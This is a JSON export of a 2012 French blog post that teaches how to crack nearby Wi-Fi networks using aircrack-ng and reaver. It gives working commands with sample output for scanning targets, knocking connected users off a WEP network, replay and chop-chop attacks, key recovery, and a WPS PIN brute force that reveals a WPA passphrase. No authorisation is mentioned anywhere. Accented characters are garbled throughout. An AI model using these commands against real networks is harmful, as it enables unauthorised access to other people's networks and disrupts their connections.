{"id":39,"date":"2012-02-14T10:09:32","date_gmt":"2012-02-14T09:09:32","guid":{"rendered":"http:\/\/snakenet.eu\/blog\/?p=39"},"modified":"2012-07-20T16:25:10","modified_gmt":"2012-07-20T15:25:10","slug":"cracker-un-reseau-wifi","status":"publish","type":"post","link":"https:\/\/snakenet.eu\/blog\/cracker-un-reseau-wifi\/39\/","title":{"rendered":"Cracker un R?seau WIFI"},"content":{"rendered":"<h1><strong>Pr?-requis : <\/strong><\/h1>\n<p>Avoir une distribution Debian ou Ubuntu. Ces distributions ne sont pas meilleures pour le crack que les autres, mais mon tutoriel est bas? uniquement sur cette distribution.<br \/>\nLes commandes fonctionnent parfaitement sur d?autres distributions. La seule diff?rence, est la mani?re d?installer les d?pendances.<\/p>\n<h2>Droits d?acc?s<\/h2>\n<p>Pour la grande majorit? des commandes, vous devez ?tre ROOT pour que cela fonctionne.<\/p>\n<p>Vous pouvez le devenir en tapant la commande ? su ? ? et en entrant le mot de passe de ? root ?<\/p>\n<h2>Installer la suite aircrack-ng (et ses d?pendances)<\/h2>\n<div>\n<pre>apt-get install libssl-dev make gcc iw\r\n\r\nwget <a href=\"http:\/\/download.aircrack-ng.org\/aircrack-ng-1.1.tar.gz\">http:\/\/download.aircrack-ng.org\/aircrack-ng-1.1.tar.gz<\/a>\r\ntar -zxvf aircrack-ng-1.1.tar.gz\r\ncd aircrack-ng-1.1\r\nmake\r\nmake install<\/pre>\n<\/div>\n<h2>Avoir une carte wifi compatible (Realtek, RALink,&#8230;) Evitez les cartes Intel&#8230;<\/h2>\n<p>Tapez la commande ?iwconfig? et regardez le mat?riel Wifi install?.<\/p>\n<div>\n<pre>root@linux-hack:~# iwconfig\r\nlo        no wireless extensions.\r\n\r\neth0      no wireless extensions.\r\n\r\nwlan0     IEEE 802.11bg  ESSID:off\/any\r\n          Mode:Managed  Access Point: Not-Associated   Tx-Power=27 dBm\r\n          Retry  long limit:7   RTS thr:off   Fragment thr:off\r\n          Encryption key:off\r\n          Power Management:off\r\npan0      no wireless extensions.<\/pre>\n<\/div>\n<p>Dans ce cas-ci, on voit que l?interface r?seau WLAN0 est une carte WIFI.<\/p>\n<h2>Comment v?rifier si elle est capable de passer en mode ? monitor ?<\/h2>\n<div>\n<pre>root@linux-hack:~# airmon-ng start wlan0\r\n Found 5 processes that could cause trouble.\r\nIf airodump-ng, aireplay-ng or airtun-ng stops working after\r\na short period of time, you may want to kill (some of) them!\r\n-e\r\n\r\nPID    Name\r\n1211   NetworkManager\r\n1220   avahi-daemon\r\n1223   avahi-daemon\r\n2298   wpa_supplicant\r\n2300   dhclient\r\n\r\nInterface      Chipset        Driver\r\nwlan0          RTL8187        rtl8187 - [phy0]\r\n                              (monitor mode enabled on mon0)<\/pre>\n<\/div>\n<p>Nous voyons que la carte WLAN0 est pass?e en mode monitor via la nouvelle interface r?seau ? MON0 ?<\/p>\n<h2>Scannez les r?seaux Wifi environnants pour trouver votre cible<\/h2>\n<div>\n<pre>airodump-ng mon0<\/pre>\n<\/div>\n<p>Cette commande va vous donner la liste de tout ce qu?il trouve<\/p>\n<div>\n<pre>CH  5 ][ Elapsed: 24 s ][ 2012-02-14 09:32\r\n\r\n BSSID              PWR  Beacons    #Data, #\/s  CH  MB   ENC  CIPHER AUTH ESSID\r\n 11:22:33:44:55:66  -36       39       30    0   9  54e. WPA  TKIP   PSK  bbox2-1234\r\n 11:22:33:44:55:66  -35       41        0    0   9  54e. OPN              bbox2-1234\r\n 11:22:33:44:55:66  -49       19        1    0   1  54e. OPN              bbox2-1234\r\n 11:22:33:44:55:66  -66       14        0    0   6  54e  WPA2 CCMP   PSK  bbox2-1234\r\n 11:22:33:44:55:66  -65       15        1    0   6  54e. WPA2 CCMP   PSK  bbox2-1234\r\n 11:22:33:44:55:66  -67        7        0    0   1  54e. OPN              bbox2-1234\r\n 11:22:33:44:55:66  -67       19        0    0   9  54 . WEP  WEP         bbox2-1234\r\n 11:22:33:44:55:66  -68        5        1    0   1  54e. WPA  TKIP   PSK  bbox2-1234\r\n 11:22:33:44:55:66  -70        4        0    0   1  54e  WPA2 CCMP   PSK  bbox2-1234\r\n 11:22:33:44:55:66  -71        4        0    0  11  54e. WPA  TKIP   PSK  bbox2-1234\r\n 11:22:33:44:55:66  -72        2        0    0   1  54e. WEP  WEP         bbox2-1234\r\n\r\n BSSID              STATION            PWR   Rate    Lost  Packets  Probes\r\n (not associated)   11:22:33:44:55:66  -72    0 - 1      0        2  bbox2-9999\r\n 11:22:33:44:55:66  11:22:33:44:55:66   -9   54e-54      0        4\r\n 11:22:33:44:55:66  11:22:33:44:55:66  -56    1e- 5      0        2<\/pre>\n<\/div>\n<p>BSSID = adresse MAC de l&rsquo;appareil<br \/>\nESSID = nom d WIFI<br \/>\nSTATION = Adresse MAC d&rsquo;un appareil wifi connect? (pc, GSM, &#8230;)<br \/>\nPWR = perte de signal entre vous et la station (-40 = bien. -70 = mauvais signal)<br \/>\nCH = canal de communication (fr?quence)<br \/>\nENC = Cryptage mis en place.<\/p>\n<p>J?ai volontairement masqu? les adresses MAC et les noms des WIFI pour des raisons de s?curit?<\/p>\n<h1>Cracker le mot de passe d?un r?seau Wifi<\/h1>\n<h2>Cracker un reseau OPN<\/h2>\n<p>Y&rsquo;a pas besoin, il n&rsquo;y a aucun cryptage<\/p>\n<h2>Cracker un r?seau WEP<\/h2>\n<p>Dans la suite, je vous pr?senterai plusieurs commandes. Celles-ci sont a lancer en simultan?. Ouvrez donc une fen?tre de terminal diff?rente ? chaque attaque\/commande<\/p>\n<h3>1? Lancer airodump en mode \u00ab\u00a0enregistrement des donn?es\u00a0\u00bb sur la cible.<\/h3>\n<p>Voici les d?tails de ma cible :<\/p>\n<div>\n<pre>BSSID                PWR  Beacons  #Data, #\/s  CH    MB     ENC    CIPHER    AUTH ESSID\r\n 11:22:33:44:55:66    -68  5        0      0    1     54e.   WEP    WEP            bbox2-1234<\/pre>\n<\/div>\n<div>\n<pre>airodump-ng -w BIBOX --ivs -c 1 -d 11:22:33:44:55:66 mon0<\/pre>\n<\/div>\n<p>Cette commande demande :<\/p>\n<p>&#8211; D&rsquo;?crire dans un fichier commen?ant par BIBOX<br \/>\n&#8211; N&rsquo;?crire que les donn?es utiles pour le crack (les IVS)<br \/>\n&#8211; De se caler sur le canal 1 (-c 1)<br \/>\n&#8211; De ne filtrer que sur l&rsquo;Access Point qui nous int?resse sur base de son adresse MAC (-d MAC )<br \/>\n&#8211; Le tout, via l&rsquo;interface r?seau \u00ab\u00a0mon0\u00a0\u00bb<\/p>\n<p><strong>Cette commande ne devra ?tre arr?t?e QUE quand on aura finalement crack? l&rsquo;AccessPoint.<\/strong><\/p>\n<h3>2? Ejecter tous les gens connect?s dessus afin de les forcer ? se reconnecter.<\/h3>\n<div>\n<pre>aireplay-ng -0 0 -a 11:22:33:44:55:66 mon0<\/pre>\n<\/div>\n<p>-0 0 : attaque 0 ex?cut?e ind?finiment (0)<br \/>\n-a MAC : adresse mac de la machine que j&rsquo;attaque<\/p>\n<p>Arr?ter la commande apr?s un certain temps. Vous pourrez la relancer plusieurs fois si vous voulez, mais n?oubliez pas de vous r?-authentifier apr?s (point suivant)<\/p>\n<h3>3? S&rsquo;authentifier sur le WIFI (faire croire qu&rsquo;on est copains)<\/h3>\n<div>\n<pre>aireplay-ng -1 0 -e 11:22:33:44:55:66 mon0<\/pre>\n<\/div>\n<p>-1 0 : attaque 1 ex?cut?e sans arr?t (0)<br \/>\n-e MAC : adresse mac de la machine que j&rsquo;attaque<\/p>\n<h3>4? Faire une attaque ? ARP ?<\/h3>\n<div>\n<pre>aireplay-ng -3  -e 11:22:33:44:55:66 mon0<\/pre>\n<\/div>\n<p>Cette attaque est TRES ?fficace quand quelqu?un est d?j? connect? sur le wifi.<br \/>\nIl vaut mieux la laisser tourner. D?s qu?elle d?marre, elle est redoutable !<\/p>\n<h3>5? Faire une attaque ? chop-chop ?<\/h3>\n<div>\n<pre>aireplay-ng -4  -e 11:22:33:44:55:66 mon0<\/pre>\n<\/div>\n<h3>6? Faire une attaque ? cofee-latte ?<\/h3>\n<div>\n<pre>aireplay-ng -6  -e 11:22:33:44:55:66 mon0<\/pre>\n<\/div>\n<p>Cette attaque est efficace si quelqu?un est d?j? connect? sur le WIFI<\/p>\n<h3>7? cracker la clef.<\/h3>\n<p>C?est bien beau de sauver les IVS, de faire des attaques, de g?n?rer du traffic et tout et tout, mais on voulait quoi d?j? ? Ah oui ! cette foutue clef !<\/p>\n<div>\n<pre>aircrack-ng *.ivs<\/pre>\n<\/div>\n<p>Laissez tourner?<\/p>\n<p>D?s que la clef sera trouv?e, vous pourrez arr?ter toutes les attaques ci-dessus.<\/p>\n<h2>Cracker du WPA<\/h2>\n<h3>Pr?-requis :<\/h3>\n<p>Installer les programmes n?cessaires ainsi que leurs d?pendances<\/p>\n<div>\n<pre>apt-get install libsqlite3-dev libpcap0.8-dev\r\n\r\n wget <a href=\"http:\/\/reaver-wps.googlecode.com\/files\/reaver-1.4.tar.gz\">http:\/\/reaver-wps.googlecode.com\/files\/reaver-1.4.tar.gz<\/a>\r\n tar -zxf reaver-1.4.tar.gz\r\n cd reaver-1.4\r\n cd src\r\n .\/configure\r\n make\r\n make install<\/pre>\n<\/div>\n<h3>Connaitre sa cible.<\/h3>\n<p>Voir point ci-dessus : Scannez les r?seaux Wifi environnants pour trouver votre cible<\/p>\n<h3>Attaquer le point WIFI<\/h3>\n<div>\n<pre>reaver -i mon0 -b 11:22:33:44:55:66<\/pre>\n<\/div>\n<p>ou, si ca ne fonctionne pas (comme chez moi)<\/p>\n<div>\n<pre>reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66<\/pre>\n<\/div>\n<p>La syntaxe est simple : lancer reaver sur l?interface wifi qui-va-bien avec comme param?tre l?adresse MAC du wifi cible (BSSID) (vous pouvez ajouter l?option ? ?vv ? pour le voir travailler)<\/p>\n<p>Le r?sultat apparait comme par enchantement !<\/p>\n<div>\n<pre>root@linux-hack:~# reaver -L -d 0 -i mon0 -b 11:22:33:44:55:66 -vv<\/pre>\n<pre>Reaver v1.4 WiFi Protected Setup Attack Tool\r\nCopyright (c) 2011, Tactical Network Solutions, Craig Heffner \r\n\r\n[+] Waiting for beacon from 11:22:33:44:55:66[+] Switching mon0 to channel 1\r\n[+] Associated with 11:22:33:44:55:66 (ESSID: bbox2-1234)\r\n[+] Trying pin 12345670\r\n[+] Sending EAPOL START request\r\n[!] WARNING: Receive timeout occurred\r\n[+] Sending EAPOL START request\r\n[+] Received identity request\r\n[+] Sending identity response\r\n[+] Received M1 message\r\n[+] Sending M2 message\r\n[+] Received M3 message\r\n[+] Sending M4 message\r\n[+] Received M5 message\r\n[+] Sending M6 message\r\n[+] Received M7 message\r\n[+] Sending WSC NACK\r\n[+] Sending WSC NACK\r\n[+] Pin cracked in 12 seconds\r\n[+] WPS PIN: '12345670'\r\n[+] WPA PSK: 'Ceciestuntutoriel'\r\n[+] AP SSID: 'bbox2-1234'\r\n[+] Nothing done, nothing to save.\r\nroot@linux-hack:~#<\/pre>\n<\/div>\n<p>Et voil?. 12 secondes pour du WPA. Le mot de passe apparait : &lsquo;Ceciestuntutoriel&rsquo;<\/p>\n<p>Si vous voulez connaitre le vendeur d&rsquo;une carte r?seau : <a title=\"Liste des vendeurs \" href=\"http:\/\/www.base64online.com\/mac_address.php\" target=\"_blank\">http:\/\/www.base64online.com\/mac_address.php<\/a><\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pr?-requis : Avoir une distribution Debian ou Ubuntu. Ces distributions ne sont pas meilleures pour le crack que les autres, mais mon tutoriel est bas? uniquement sur cette distribution. Les commandes fonctionnent parfaitement sur d?autres distributions. La seule diff?rence, est la mani?re d?installer les d?pendances. Droits d?acc?s Pour la grande majorit? des commandes, vous devez [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[13,8,12,10,9,11],"class_list":["post-39","post","type-post","status-publish","format-standard","hentry","category-wifi","tag-aircrack","tag-crack","tag-reaver","tag-wep","tag-wifi-2","tag-wpa"],"_links":{"self":[{"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/posts\/39","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/comments?post=39"}],"version-history":[{"count":11,"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/posts\/39\/revisions"}],"predecessor-version":[{"id":61,"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/posts\/39\/revisions\/61"}],"wp:attachment":[{"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/media?parent=39"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/categories?post=39"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/snakenet.eu\/blog\/wp-json\/wp\/v2\/tags?post=39"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}